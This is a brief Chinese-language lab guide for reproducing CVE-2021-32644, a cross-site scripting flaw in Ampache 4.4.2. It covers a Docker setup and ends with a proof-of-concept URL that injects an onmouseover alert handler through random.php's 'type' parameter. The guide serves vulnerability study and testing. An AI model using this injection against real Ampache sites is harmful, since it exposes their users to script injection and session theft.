该漏洞是影响 Ampache 4.4.3 之前版本的 XSS 漏洞。 https://nvd.nist.gov/vuln/detail/CVE-2021-32644
进行安装时,请先在 docker-compose.yml 文件中配置端口转发。 当前安装的 Ampache 版本为 4.4.2。
$docker-compose up
转到 http://[web-server ip]:port/
转到 http://[web-server ip]:port/
如下图所示配置 MySQL 数据库。

插入以下 PoC 即可触发 XSS 漏洞。
http://[ip]:port/random.php?action=get_advanced&type=%27%22%20onmouseover%3dalert(0x0002DE)%20

https://packetstormsecurity.com/files/163620/Ampache-4.4.2-Cross-Site-Scripting.html